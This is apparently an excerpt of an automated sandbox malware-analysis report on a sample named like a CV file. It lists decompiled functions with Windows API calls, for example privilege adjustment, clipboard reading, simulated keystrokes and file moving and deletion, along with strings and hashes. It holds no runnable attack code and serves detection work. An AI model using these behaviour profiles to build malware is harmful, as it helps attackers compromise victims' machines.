                                                                                            • Opcode Fuzzy Hash: bdc8481e20df265532b0ffcbc71a6ee067028a5d8e73504dd81b0e7e339a8e3e
                                                                                            • Instruction Fuzzy Hash: 7DE0CD366001245BC7119754DC46FFE779DDFC8690F0900B5F905E7255DD64D9C18690
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000001F4), ref: 01B26991
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                            • Instruction ID: 78ca3e68df1df819db4596c108c092005a9d805c3662d904f6a05cf139e2f657
                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                            • Instruction Fuzzy Hash: BBE0BF7494010DDFDB00EFA4D5496DE7BB4EF04301F1001A1FD05D2281DA319D508A62
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0012F87D
                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0012F8DC
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0012F919
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0012F940
                                                                                            • SendMessageW.USER32 ref: 0012F966
                                                                                            • _wcsncpy.LIBCMT ref: 0012F9D2
                                                                                            • GetKeyState.USER32(00000011), ref: 0012F9F3
                                                                                            • GetKeyState.USER32(00000009), ref: 0012FA00
                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0012FA16
                                                                                            • GetKeyState.USER32(00000010), ref: 0012FA20
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0012FA4F
                                                                                            • SendMessageW.USER32 ref: 0012FA72
                                                                                            • SendMessageW.USER32(?,00001030,?,0012E059), ref: 0012FB6F
                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0012FB85
                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0012FB96
                                                                                            • SetCapture.USER32(?), ref: 0012FB9F
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012FC03
                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0012FC0F
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0012FC29
                                                                                            • ReleaseCapture.USER32 ref: 0012FC34
                                                                                            • GetCursorPos.USER32(?), ref: 0012FC69
                                                                                            • ScreenToClient.USER32(?,?), ref: 0012FC76
                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0012FCD8
                                                                                            • SendMessageW.USER32 ref: 0012FD02
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0012FD41
                                                                                            • SendMessageW.USER32 ref: 0012FD6C
                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0012FD84
                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0012FD8F
                                                                                            • GetCursorPos.USER32(?), ref: 0012FDB0
                                                                                            • ScreenToClient.USER32(?,?), ref: 0012FDBD
                                                                                            • GetParent.USER32(?), ref: 0012FDD9
                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0012FE3F
                                                                                            • SendMessageW.USER32 ref: 0012FE6F
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012FEC5
                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0012FEF1
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0012FF19
                                                                                            • SendMessageW.USER32 ref: 0012FF3C
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012FF86
                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0012FFB6
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0013004B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                            • String ID: @GUI_DRAGID$F
                                                                                            • API String ID: 2516578528-4164748364
                                                                                            • Opcode ID: d3fab0895f6cf0709ed827d8854e877d674cea522f47ede6dd8244fdf553a42e
                                                                                            • Instruction ID: 7e7f9cdda594c6e23483a6abf9039b75744329790531229374c99702bcf45357
                                                                                            • Opcode Fuzzy Hash: d3fab0895f6cf0709ed827d8854e877d674cea522f47ede6dd8244fdf553a42e
                                                                                            • Instruction Fuzzy Hash: FD32C979A00254AFDB14CF64E880BAABBB8FF49344F14063DF695872A1D770DDA2CB51
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0012B1CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: %d/%02d/%02d
                                                                                            • API String ID: 3850602802-328681919
                                                                                            • Opcode ID: ca028ca276b4ad6bfbef5c9781210c4df6c46f189dba84988ae68f10b7069e27
                                                                                            • Instruction ID: 88dc150d003b18fb088ccc23c350bf3f110ffa631b824144cc927e53f5e8533e
                                                                                            • Opcode Fuzzy Hash: ca028ca276b4ad6bfbef5c9781210c4df6c46f189dba84988ae68f10b7069e27
                                                                                            • Instruction Fuzzy Hash: 9E12F171604229AFEB249F64EC89FAE7BB8FF45310F114119F916DB2E1DB708961CB21
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00000000), ref: 000DEB4A
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00133AEA
                                                                                            • IsIconic.USER32(000000FF), ref: 00133AF3
                                                                                            • ShowWindow.USER32(000000FF,00000009), ref: 00133B00
                                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00133B0A
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00133B20
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00133B27
                                                                                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00133B33
                                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00133B44
                                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00133B4C
                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00133B54
                                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00133B57
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B6C
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133B77
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B81
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133B86
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B8F
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133B94
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B9E
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133BA3
                                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00133BA6
                                                                                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00133BCD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 4125248594-2988720461
                                                                                            • Opcode ID: 898e7a7bb09b70fe2b1fc82e747872d776b1a803f5f910cea1ed78b5de8fe7cb
                                                                                            • Instruction ID: 7e4fc1daf8e649bf0b71dde22538c854afd9f2e5fab83e41a2626fe38e1b0ccc
                                                                                            • Opcode Fuzzy Hash: 898e7a7bb09b70fe2b1fc82e747872d776b1a803f5f910cea1ed78b5de8fe7cb
                                                                                            • Instruction Fuzzy Hash: 39319275A40318BBEF206BA5AC49F7F7E7CEB45B50F114025FA05EA1E0DBB05D40AAA4
                                                                                            APIs
                                                                                              • Part of subcall function 000FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000FB180
                                                                                              • Part of subcall function 000FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000FB1AD
                                                                                              • Part of subcall function 000FB134: GetLastError.KERNEL32 ref: 000FB1BA
                                                                                            • _memset.LIBCMT ref: 000FAD08
                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000FAD5A
                                                                                            • CloseHandle.KERNEL32(?), ref: 000FAD6B
                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000FAD82
                                                                                            • GetProcessWindowStation.USER32 ref: 000FAD9B
                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 000FADA5
                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000FADBF
                                                                                              • Part of subcall function 000FAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000FACC0), ref: 000FAB99
                                                                                              • Part of subcall function 000FAB84: CloseHandle.KERNEL32(?,?,000FACC0), ref: 000FABAB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                            • String ID: $default$winsta0
                                                                                            • API String ID: 2063423040-1027155976
                                                                                            • Opcode ID: 9e27a5249b3a7afd7b5d2f1d429d697a4f7422b21d06a71315f949b7b5ddf570
                                                                                            • Instruction ID: 7cfe78727a1e65fc7e689e010a2ba10d92b3c2e9152e57112ce527d38a808821
                                                                                            • Opcode Fuzzy Hash: 9e27a5249b3a7afd7b5d2f1d429d697a4f7422b21d06a71315f949b7b5ddf570
                                                                                            • Instruction Fuzzy Hash: E4818EB1A0020DAFDF119FA4DC45AFE7BB8FF06304F044129FA18A6961D7718E55EB61
                                                                                            APIs
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00105FA6,?), ref: 00106ED8
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00105FA6,?), ref: 00106EF1
                                                                                              • Part of subcall function 0010725E: __wsplitpath.LIBCMT ref: 0010727B
                                                                                              • Part of subcall function 0010725E: __wsplitpath.LIBCMT ref: 0010728E
                                                                                              • Part of subcall function 001072CB: GetFileAttributesW.KERNEL32(?,00106019), ref: 001072CC
                                                                                            • _wcscat.LIBCMT ref: 00106149
                                                                                            • _wcscat.LIBCMT ref: 00106167
                                                                                            • __wsplitpath.LIBCMT ref: 0010618E
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 001061A4
                                                                                            • _wcscpy.LIBCMT ref: 00106209
                                                                                            • _wcscat.LIBCMT ref: 0010621C
                                                                                            • _wcscat.LIBCMT ref: 0010622F
                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0010625D
                                                                                            • DeleteFileW.KERNEL32(?), ref: 0010626E
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00106289
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00106298
                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 001062AD
                                                                                            • DeleteFileW.KERNEL32(?), ref: 001062BE
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 001062E1
                                                                                            • FindClose.KERNEL32(00000000), ref: 001062FD
                                                                                            • FindClose.KERNEL32(00000000), ref: 0010630B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 1917200108-1173974218
                                                                                            • Opcode ID: e306b6fd309cca7c6f14aa876bf2326555bfe44d767ac9eac40463d32b53a4a9
                                                                                            • Instruction ID: e883a4c827790b8811fded2641e628e96a97fbfc4cc01d36b9966883a7a18e8f
                                                                                            • Opcode Fuzzy Hash: e306b6fd309cca7c6f14aa876bf2326555bfe44d767ac9eac40463d32b53a4a9
                                                                                            • Instruction Fuzzy Hash: 435120B290811CAACB21EB91DC45DEF77BCAF15300F0501EAE585E2181DFB697998FA4
                                                                                            APIs
                                                                                            • OpenClipboard.USER32(0015DC00), ref: 00116B36
                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00116B44
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00116B4C
                                                                                            • CloseClipboard.USER32 ref: 00116B58
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00116B74
                                                                                            • CloseClipboard.USER32 ref: 00116B7E
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00116B93
                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00116BA0
                                                                                            • GetClipboardData.USER32(00000001), ref: 00116BA8
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00116BB5
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00116BE9
                                                                                            • CloseClipboard.USER32 ref: 00116CF6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                            • String ID:
                                                                                            • API String ID: 3222323430-0
                                                                                            • Opcode ID: 1ae0728d711522d4515436ee12e686d8fe6f3d2b241be8f24026f0ae363c5091
                                                                                            • Instruction ID: 7f0ec5581e8a46c48f26d68d4da33ec40d18be2b6067f51cf893bbc7d62c71fd
                                                                                            • Opcode Fuzzy Hash: 1ae0728d711522d4515436ee12e686d8fe6f3d2b241be8f24026f0ae363c5091
                                                                                            • Instruction Fuzzy Hash: 1551D035204201ABD708EF60EC46FAE77A8EF95B00F01012DFA9AD31E1DF71D9858B62
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0010F62B
                                                                                            • FindClose.KERNEL32(00000000), ref: 0010F67F
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0010F6A4
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0010F6BB
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0010F6E2
                                                                                            • __swprintf.LIBCMT ref: 0010F72E
                                                                                            • __swprintf.LIBCMT ref: 0010F767
                                                                                            • __swprintf.LIBCMT ref: 0010F7BB
                                                                                              • Part of subcall function 000E172B: __woutput_l.LIBCMT ref: 000E1784
                                                                                            • __swprintf.LIBCMT ref: 0010F809
                                                                                            • __swprintf.LIBCMT ref: 0010F858
                                                                                            • __swprintf.LIBCMT ref: 0010F8A7
                                                                                            • __swprintf.LIBCMT ref: 0010F8F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                            • API String ID: 835046349-2428617273
                                                                                            • Opcode ID: c0f2585ea806ec7abba0422852b15ff4fb0cbe904b963e317670f1598141d350
                                                                                            • Instruction ID: 0d6709c49a0b2e0cfa6b5213da5c27886f9473ae4e562c4f0b53ff2a1b2c7279
                                                                                            • Opcode Fuzzy Hash: c0f2585ea806ec7abba0422852b15ff4fb0cbe904b963e317670f1598141d350
                                                                                            • Instruction Fuzzy Hash: FAA121B2408344ABD310EB95C896EEFB7ECBF98704F44092EF595C2192EB34D949C762
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00111B50
                                                                                            • _wcscmp.LIBCMT ref: 00111B65
                                                                                            • _wcscmp.LIBCMT ref: 00111B7C
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00111B8E
                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00111BA8
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00111BC0
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111BCB
                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00111BE7
                                                                                            • _wcscmp.LIBCMT ref: 00111C0E
                                                                                            • _wcscmp.LIBCMT ref: 00111C25
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00111C37
                                                                                            • SetCurrentDirectoryW.KERNEL32(001739FC), ref: 00111C55
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00111C5F
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111C6C
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111C7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1803514871-438819550
                                                                                            • Opcode ID: 703f38a3f1aaab8cb250cb23259a80cf865702b8eac978ebe244bdb4b1fe3273
                                                                                            • Instruction ID: 754a8a584448cf067bd8ea05b23642f7a0662533e72b89fda270a44b62649d91
                                                                                            • Opcode Fuzzy Hash: 703f38a3f1aaab8cb250cb23259a80cf865702b8eac978ebe244bdb4b1fe3273
                                                                                            • Instruction Fuzzy Hash: C5319536640619BEDF149BA0EC49BDEB7BC9F06324F1045A5EA15E30A0EB70DAC58A64
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00111CAB
                                                                                            • _wcscmp.LIBCMT ref: 00111CC0
                                                                                            • _wcscmp.LIBCMT ref: 00111CD7
                                                                                              • Part of subcall function 00106BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00106BEF
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00111D06
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111D11
                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00111D2D
                                                                                            • _wcscmp.LIBCMT ref: 00111D54
                                                                                            • _wcscmp.LIBCMT ref: 00111D6B
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00111D7D
                                                                                            • SetCurrentDirectoryW.KERNEL32(001739FC), ref: 00111D9B
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00111DA5
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111DB2
                                                                                            • FindClose.KERNEL32(00000000), ref: 00111DC2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1824444939-438819550
                                                                                            • Opcode ID: 8a0e42f16eb26c8784ae784bd46bca9c7fb394032821c7c0e9c5d1cca4d25fc5
                                                                                            • Instruction ID: b2af97a87e28475c5791cf7a0b8dae4633f1381604f3bad8bef5d0f41c24aca2
                                                                                            • Opcode Fuzzy Hash: 8a0e42f16eb26c8784ae784bd46bca9c7fb394032821c7c0e9c5d1cca4d25fc5
                                                                                            • Instruction Fuzzy Hash: EE31E83650061ABEDF18EFE0FC09ADEB7AD9F46324F1045A5EA11A30A1DB70DBC58B54
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset
                                                                                            • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                            • API String ID: 2102423945-2023335898
                                                                                            • Opcode ID: 2db1ac4ee8c73dbe160145e21131f428646a192edde509d4a06ea33aea5aed97
                                                                                            • Instruction ID: 091c5278ce919e202e2bedb85bccd98908825abd7f9bdcb324d33e5b98b359f8
                                                                                            • Opcode Fuzzy Hash: 2db1ac4ee8c73dbe160145e21131f428646a192edde509d4a06ea33aea5aed97
                                                                                            • Instruction Fuzzy Hash: 97828071D04219DBCB24CF98C881BEDBBB1BF48314F2581AED859AB391E7749D85CB90
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?), ref: 001109DF
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001109EF
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001109FB
                                                                                            • __wsplitpath.LIBCMT ref: 00110A59
                                                                                            • _wcscat.LIBCMT ref: 00110A71
                                                                                            • _wcscat.LIBCMT ref: 00110A83
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00110A98
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110AAC
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110ADE
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110AFF
